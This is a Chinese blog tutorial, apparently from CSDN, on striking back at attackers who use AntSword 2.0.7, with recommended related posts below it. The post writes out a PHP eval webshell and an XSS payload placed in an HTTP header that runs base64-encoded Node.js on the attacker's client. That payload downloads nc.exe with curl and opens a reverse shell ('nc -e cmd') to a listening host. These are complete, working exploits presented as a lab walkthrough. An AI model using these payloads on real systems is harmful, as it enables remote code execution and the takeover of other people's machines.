反制攻击者-蚁剑低版本

于 2024-08-03 21:23:25 发布
阅读量348 收藏 7
点赞数 9
分类专栏: 溯源反制 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39972370/article/details/140897082
版权

目录

安装

攻击者获取防守方的权限

防守方反制攻击者

防守方获取攻击者的shell权限

安装

安装蚁剑2.0.7版本

链接:https://pan.baidu.com/s/1t40UxkZ2XuSWG6VCdGzvDw?pwd=8888

提取码:8888

下载好后先打开Loader文件夹下的.exe文件,打开后会要求载入文件

然后选中这个antSword-2.0.7载入,重启刚刚的.exe文件,就可以使用了

攻击者获取防守方的权限

【注意】:我这里演示的虚拟机为防守方,物理机为攻击方(两台都是windows系统)

在虚拟机中,使用phpstudy或者phpenv工具搭建一个php站点,站点下只需放入一个1.php文件

1.php文件中写入一句话木马

<?php eval($_REQUEST[6]); ?>

在物理机中,能访问到该站点下的1.php文件

尝试使用刚刚下载的2.0.7版本的蚁剑进行连接,能够连接受害主机

防守方反制攻击者

在实际场景中,防守方被上传了一句话木马,从而被攻击者控制。

防守方可以在木马文件中写入一些xss代码,入侵者重新连接webshell时,就会触发xss。

防守方修改1.php文件内容,尝试弹窗

<?php header('HTTP/1.1 500 <img src=# onerror=alert(1)>'); ?>

在物理机中,双击蚁剑刚刚建立的连接

弹窗代码成功执行

防守方再次修改1.php文件内容

<?PHP
 header("HTTP/1.1 500 Not \<img src=# onerror='eval(new Buffer(`Y29uc3QgeyBleGVjIH0gPSByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJyk7CmV4ZWMoJ2NhbGMnKTs=`,`base64`).toString())'>");
 ?>

上面的代码中包含了一段base64编码的内容,我们解码出来看看

发现执行了一个node.js脚本,exec()函数会创建一个新的子进程来运行'calc'命令,从而弹出计算器

const { exec } = require('child_process'); 
exec('calc');

再次双击刚刚蚁剑建立的连接,弹出了计算器

防守方获取攻击者的shell权限

我们有没有什么办法获取攻击者的shell权限呢?答案是可以的

先新建一个文件夹,里面放入一个nc.exe文件

nc工具下载链接:https://pan.baidu.com/s/1EJT_8kZ2FbDmdE-w6TSXMA?pwd=8888

提取码:8888

在这个放有nc.exe程序的目录下打开终端,开启一个http服务:python -m http.server

访问页面http://防守方ip:8000

发现创建了一个站点,并且该站点下有一个nc.exe文件可以下载

在防守方开启一个监听,监听8888端口:nc -lvp 8888

接下来构造获取攻击者权限的php代码

下面这个命令表示从刚刚构造的站点下载nc.exe文件,并且通过nc命令进行反弹shell的操作(注意把ip替换成自己的防守方ip):

curl -o nc.exe http://192.168.47.148:8000/nc.exe & nc -e cmd 192.168.47.148 8888

我们把上面这个代码放到刚刚弹计算器的代码中:

const { exec } = require('child_process');
exec('curl -o nc.exe http://192.168.47.148:8000/nc.exe & nc -e cmd 192.168.47.148 8888');

对上面的代码base64编码:

Y29uc3QgeyBleGVjIH0gPSByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJyk7CmV4ZWMoJ2N1cmwgLW8gbmMuZXhlIGh0dHA6Ly8xOTIuMTY4LjQ3LjE0ODo4MDAwL25jLmV4ZSAmIG5jIC1lIGNtZCAxOTIuMTY4LjQ3LjE0OCA4ODg4Jyk7

放到前面php代码的Buffer中,保存该php文件:

<?PHP
  header("HTTP/1.1 500 Not \<img src=# onerror='eval(new Buffer(`Y29uc3QgeyBleGVjIH0gPSByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJyk7CmV4ZWMoJ2N1cmwgLW8gbmMuZXhlIGh0dHA6Ly8xOTIuMTY4LjQ3LjE0ODo4MDAwL25jLmV4ZSAmIG5jIC1lIGNtZCAxOTIuMTY4LjQ3LjE0OCA4ODg4Jyk7`,`base64`).toString())'>");
?>

当攻击者再次尝试通过蚁剑访问时,会触发php代码里面的内容

防守方监听到攻击者触发了反弹shell的代码,从而获取攻击者的shell权限

阿宙宙宙
关注
  • 9
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
红队系列-溯源与应急反制专题
aming小老弟
11-09 368
日志分析、流量特征分析、内存马。
【应急响应】战中溯源反制&对抗上线CS&Goby&&Sqlmap等安全工具
今天是几号的博客
04-20 1676
CS反制 Goby反制 Antsword反制 AWVS反制 BURP反制 SQLMAP反制 XSS钓鱼 蜜罐反制。前面准备工作都是一气呵成,这里有个一很坑的地方就是使用pip安装Frida module时,一开始安装总是报错(tiemout以及各种问题),然后我不停的换Pytthon版本emmm,最后解决是使用超级管理员权限运行cmd就好了(心中无数个?) ```bash python cve-2022-39197.py beacon.exe http://可访问的WEB:8888/evil.sv
7、应急响应-战中溯源反制&对抗上线&&CS&Goby&Sqlmap等安全工具
m0_65842464的博客
01-29 2700
黑客一般会用到工具Sqlmap,Goby等对目标网站的现有资产做批量扫描和测试,同时也会利用Web应用漏洞上传后门来上线肉机,用到工具例如:,CS等,那么作为蓝队应急人员,就可以针对这些行为采取反制手段。命令管道符:ping "`dir`" , linux系统执行该命令时,管道符中的字符串被当作命令执行。原理:蓝队在红队攻击目标上写一个特殊文件,红队用goby扫描分析时会触发反制被蓝队拿到机器权限。同样以上命令在红队攻击机执行时,参数b管道符中的字符串会被当做命令执行。
应急响应-战中反制&对抗上线CS&Goby&&Sqlmap等安全工具
siu~
04-11 770
知识点 战中-反制-安全工具篇 CS反制(有版本限制) Goby反制(有版本限制,新版goby已修复) Antsword反制(有版本限制,别人也不一定用) AWVS反制(有版本限制,在awvs 10版本存在) BURP反制(有版本限制,在2020以下版本存在) SQLMAP反制(对于老手而言有点难,特征较为明显) XSS钓鱼 蜜罐反制
红蓝对抗-反制
热门推荐
Shanfenglan's blog
01-19 6万+
CATALOG1.前言2. 1.前言 初次接触反制技术,写一个文档作为记录。 2.
溯源反制思路整合
风炫的博客
07-27 2357
溯源反制思路整合 文章目录溯源反制思路整合0x01反制的整体思路0x02 反制具体思路0x0201 反制主机0x0202 反制后门附件0x0203 反制攻击工具0x03 拿下傀儡机之后如何进行源IP的查找0x0301 日志分析01 Web日志分析02 系统日志分析0x0302 进程分析WindowsLinux0x0303 流量分析通用Windowslinux0x0304 服务查询WindowsLInux0x0305 其他技巧通用查询在线登陆者0x04 溯源相关思路根据IP进行溯源根据域名进行溯源根据ID溯源
渗透测试-流量加密之冰蝎&
道阻且长,行则将至。
11-08 1万+
文章目录前言 前言
关于(AntSword)的溯源反制
Welcome To Myon'Blog !
12-30 1098
如果攻击者再次连接或者进入shell,则会报错,并且反弹一个shell给我们在1971端口上,我们可以利用该shell执行命令等,甚至溯源到对方的外网ip。如果我们发现了这个shell,我们该如何反击呢?以物理机为攻击机,虚拟机kali模拟受害者,之后使用kali进行溯源反制。最开始以为是系统问题,于是全换成Windows系统测试,依旧未成功。启用kali的Apache服务,用于模拟一个对外开放的服务。(我不清楚是否是我版本的问题还是什么问题)我这里使用的版本是2.1.15的(
的分析和利用
kali_Ma的博客
11-19 1870
前言 这篇文章主要是以虚拟终端模块执行命令功能为例,逐步分析,并通过分析结果优化对应脚本的方法。 前情回顾 已经解决了初步认证的问题 经分析,通过连通密钥首即可通过的认证,达到连接成功的目的,但是连接成功后会出现这种情况。 所以我进行初步猜测,虚拟终端初始化没有问题,执行命令出现问题,所以我最开始的分析就先从执行命令功能开始进行。 【一>所有资源获取<一】 1、200份很多已经买不到的绝版电子书 2、30G安全大厂内部的视频资料 3、100份src文档 4、常见安全面试题 5、ctf大
攻击者溯源反制思维导图
12-20
攻击者溯源反制思维导图攻击者溯源反制思维导图攻击者溯源反制思维导图攻击者溯源反制思维导图攻击者溯源反制思维导图攻击者溯源反制思维导图攻击者溯源反制思维导图
中国2.1.9_内含源码和加载器.rar
11-19
3. **安全启动**:加载器可能有防止反调试和反动态分析的机制,以保护免受恶意篡改。 4. **跨平台兼容**:考虑到Windows版本的提及,加载器可能还支持其他操作系统,如Linux或macOS。 5. **快速启动**:一键...
Java反编译神器jd-gui最新1.4版本
11-05
最新版jd-gui,适用于x86版本的JDK,JDK最低要求1.6,最高支持1.8
最新版本反编译攻击集合,包含dex2jar-v2.1版本
11-25
反编译攻击是指恶意用户通过特定工具将已编译的程序(如Java的.dex文件或Android应用程序)转换回源代码,以理解其内部工作原理,寻找潜在的安全漏洞或侵犯知识产权。标题和描述提及的是一个最新的反编译攻击集合,...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8361
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
2019年中国民航大学电子制作比赛---蓝牙音响.zip
08-03
大学生参加学科竞赛有着诸多好处,不仅有助于个人综合素质的提升,还能为未来职业发展奠定良好基础。以下是一些分析: 首先,学科竞赛是提高专业知识和技能水平的有效途径。通过参与竞赛,学生不仅能够深入学习相关专业知识,还能够接触到最新的科研成果和技术发展趋势。这有助于拓展学生的学科视野,使其对专业领域有更深刻的理解。在竞赛过程中,学生通常需要解决实际问题,这锻炼了他们独立思考和解决问题的能力。 其次,学科竞赛培养了学生的团队合作精神。许多竞赛项目需要团队协作来完成,这促使学生学会有效地与他人合作、协调分工。在团队合作中,学生们能够学到如何有效沟通、共同制定目标和分工合作,这对于日后进入职场具有重要意义。 此外,学科竞赛是提高学生综合能力的一种途径。竞赛项目通常会涉及到理论知识、实际操作和创新思维等多个方面,要求参赛者具备全面的素质。在竞赛过程中,学生不仅需要展现自己的专业知识,还需要具备创新意识和解决问题的能力。这种全面的综合能力培养对于未来从事各类职业都具有积极作用。 此外,学科竞赛可以为学生提供展示自我、树立信心的机会。通过比赛的舞台,学生有机会展现自己在专业领域的优势,得到他人的认可和赞誉。这对于培养学生的自信心和自我价值感非常重要,有助于他们更加积极主动地投入学习和未来的职业生涯。 最后,学科竞赛对于个人职业发展具有积极的助推作用。在竞赛中脱颖而出的学生通常能够引起企业、研究机构等用人单位的关注。获得竞赛奖项不仅可以作为个人履历的亮点,还可以为进入理想的工作岗位提供有力的支持。
22NM60N-VB TO220一款N-Channel沟道TO220的MOSFET晶体管参数介绍与应用说明
最新发布
08-03
22NM60N-VB TO220;Package:TO220;Configuration:Single-N-Channel;VDS:650V;VGS:30(±V);Vth:3.5V;RDS(ON)=160mΩ@VGS=10V;ID:20A;Technology:SJ_Multi-EPI;
22N60L-VB一款N-Channel沟道TO247的MOSFET晶体管参数介绍与应用说明
08-03
22N60L-VB;Package:TO247;Configuration:Single-N-Channel;VDS:650V;VGS:30(±V);Vth:3.5V;RDS(ON)=160mΩ@VGS=10V;ID:20A;Technology:SJ_Multi-EPI;
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值